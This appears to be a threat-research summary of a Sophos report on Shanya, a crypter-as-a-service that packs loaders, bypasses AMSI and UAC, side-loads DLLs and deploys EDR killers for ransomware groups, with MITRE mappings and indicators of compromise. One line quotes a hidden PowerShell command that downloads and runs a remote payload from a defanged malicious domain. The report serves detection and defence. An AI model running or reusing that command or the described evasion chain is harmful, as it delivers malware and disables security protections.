Threat Research

Inside Shanya, a packer-as-a-service fueling modern attacks

Sophos
Inside Shanya, a packer-as-a-service fueling modern attacks

Shanya is a packer-as-a-service (crypter) widely used in 2025 to obfuscate loaders and payloads, enable AMSI and UAC bypasses, perform DLL side-loading, and deliver EDR-killing components that facilitate ransomware and backdoor deployments. The service has been linked to multiple malware families and operations—including CastleRAT and Akira—and associated IOCs include packed sample hashes, malicious domains, and side-loaded DLL/file names. #Shanya #CastleRAT

Keypoints

  • Shanya is a crypter/packer-as-a-service promoted in underground forums and adopted by multiple ransomware and malware operators.
  • Early samples contained identifying artifacts (e.g., shanya_crypter.exe and morphed DLL names) that tied multiple samples to the same service.
  • The packer employs heavy obfuscation, API hashing, hiding data in the PEB (GdiHandleBuffer), AMSI bypass for .NET, anti-VM/sandbox checks, and RtlDeleteFunctionTable anti-analysis abuse.
  • Loaders overwrite a second instance of a legitimate system DLL in memory (commonly shell32.dll), modify LDR structures, and load a decrypted/compressed payload via undocumented LdrLoadDll behavior.
  • A prominent use case is an EDR killer deployed via DLL side-loading (e.g., consent.exe + msimg32.dll) that loads a malicious kernel driver by abusing a vulnerable clean driver to terminate protection processes and services.
  • Shanya-packed files have been observed delivering multiple malware families (e.g., BumbleBee, StealC, CastleRAT) and supporting ransomware operations including Akira, Qilin, Crytox, and Medusa-linked campaigns.
  • Observed distribution included global detections during 2025 with notable prevalence in specific countries; Sophos provides detections labeled ATK/Shanya-B/C/D and published IOCs on GitHub.

MITRE Techniques

  • [T1071.001 ] Application Layer Protocol: Web Protocols – Used by CastleRAT to fetch next-stage payloads via PowerShell web requests (‘powershell -w h -ep b -c “iex (iwr ‘biokdsl[.]com/upd’ -useb).Content”‘).

Indicators of Compromise

  • [File Hash ] example packed and sample hashes – 6645297a0a423564f99b9f474b0df234d6613d04df48a94cb67f541b8eb829d1, 59906b022adfc6f63903adbdbb64c82881e0b1664d6b7f7ee42319019fcb3d7e (and 2 more hashes).
  • [Domain ] download C2 and update servers used in campaigns – biokdsl[.]com/upd, biklkfd[.]com/upd.
  • [File Name ] side-loading and loader artifacts – consent.exe, msimg32.dll, wmsgapi.dll (malicious side-loaded DLL inflated to ~656MB).
  • [DLL/Module Name ] modified or impersonated system modules observed in memory – shell32.dll mapped as mustard64.dll (PE-SIEVE flagged), shanya_f■ck4v_0x000CFA85…dll.
  • [Driver/File ] kernel drivers involved in EDR-killer chain – ThrottleStop.sys (rwdrv.sys) (legitimate driver abused), hlpdrv.sys (malicious unsigned driver).

Read more: https://news.sophos.com/en-us/2025/12/06/inside-shanya-a-packer-as-a-service-fueling-modern-attacks/